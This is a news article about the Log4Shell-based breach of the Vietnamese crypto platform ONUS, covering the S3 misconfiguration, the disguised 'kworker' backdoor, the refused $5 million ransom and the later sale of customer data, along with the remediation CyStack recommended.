FinTech Company Impacted by Log4j Says No to Paying the Ransom
A Vulnerable Version of the Known Log4Shell Allowed Hackers to Breach the Firm’s System.
A cyberattack has recently impacted ONUS, one of the biggest Vietnamese crypto trading platforms. Hackers targeted the company’s payment system where a vulnerable version of Log4j was running.
After the cyberattack happened, extortion followed, as hackers reportedly started to blackmail the firm to pay a ransom amounting to $5 million, otherwise, customer data would become public.
According to the BleepingComputer publication, the company refused to pay, so the information related to almost 2 million customers of ONUS ended up for sale on forums.
More Details Regarding the ONUS Incident
A Proof of Concept (POC) exploit appeared on Github around December 9 for the well-known and currently making headlines Log4j vulnerability classified as CVE-2021-44228. From then on, threat actors have seen an opportunity to massively exploit it.
One of their targets was an ONUS’s Cyclos server which ran a vulnerable version of Log4Shell. The hackers successfully managed to exploit it during the timeframe between December 11 and December 13. They also planted backdoors to make the access more powerful.
On December 13 a Cyclo’s advisory came out that reportedly let ONUS know about the fact that its systems must be patched, however, even if the Cyclos instance was patched, it seemed to be a belated action. Threat actors had their time to exfiltrate sensitive databases they wanted through the exposure window.
According to BleepingComputer, almost 2 million customer records were stored on those databases, these also including E-KYC (Know Your Customer) information along with hashed passwords and personal data.
It’s worth mentioning that the Log4Shell vulnerability was located on a sandbox server serving “for programming purposes only”. But, because of a misconfiguration in the system, hackers could gain access to other storage locations like Amazon S3 buckets where production data was stored.
What happened next, reportedly, was that the threat actors requested ONUS to pay a ransom of $5 million which the company refused to do and decided to let customers know about the cyberattack in a private Facebook group.
Chien Tran, the CEO from ONUS declared that
As a company that puts safety first, we are committed to providing our customers with transparency and integrity in business operations. (…) That is why, after careful consideration, the right thing we need to do now is to inform the entire ONUS community about this incident.
What Data Was Exfiltrated by Hackers?
According to an announcement published by ONUS on this topic, hackers managed to retrieve the following customer data from the fintech company:
- Name, phone number, and email address;
- KYC data (procedures used by Fintech enterprises to get identification documents and customers’ proofs along with “video selfie” for an automated check);
- Encrypted history;
- Transaction history;
- Other encrypted data.
The Misconfiguration in the Amazon S3 Buckets
Besides Log4j, which facilitated an entry for the threat actors, there was another issue too with ONUS’ Amazon S3 buckets linked to improper access control.
During monitoring, CyStack – ONUS’s security partner, detected and reported a cyber attack on ONUS system to us. The hacker took advantage of a vulnerability in a set of libraries on the ONUS system to get into the sandbox server (for programming purposes only). However, due to a configuration problem, this server contains information that gave bad guys access to our data storage system (Amazon S3) and stole some essential data.
CyStack started an investigation on the incident and published their report with details about the cyberattack and the backdoor the hackers managed to plant on the impacted system.
Also on these servers, ONUS had a script to periodically back up the database to S3 which contained the database hostname and username/password as well as backup SQL files. As a consequence, the attackers could access the ONUS database to get user information. (…) To facilitate access, the attackers downloaded and ran a backdoor on the server. This backdoor was named kworker for the purpose of disguising as the Linux operating system’s kworker service. (…) The kworker backdoor obtained was written in Golang 1.17.2 and built for Linux x64. It was used as a tunnel connecting the C&C server and the compromised server via SSH protocol (a wise way to avoid detection!).
Not Paying the Ransom Led to Data Exposure
As per BleepingComputer, since the company refused to pay the required ransom to hackers, by December 25, the customer data ended up for sale on a data breach marketplace.
Hackers declared that they are in the possession of no less than 395 ONUS database tables copies where personal data and hashed passwords can be found.
CyStack recommended ONUS to patch the Log4j, to make sure the exposed AWS credentials are deactivated, to configure correctly AWS access permissions along with the advice that public access to critical S3 buckets should be blocked.
ONUS also added that its assets were not impacted and that the company’s team has been working with security experts to discover vulnerabilities and fix them. Besides, ONUS Custody, the company’s asset management, and storage system, was upgraded. In case of any property loss, the company assures that this issue can be addressed through the ONUS Protection Fund.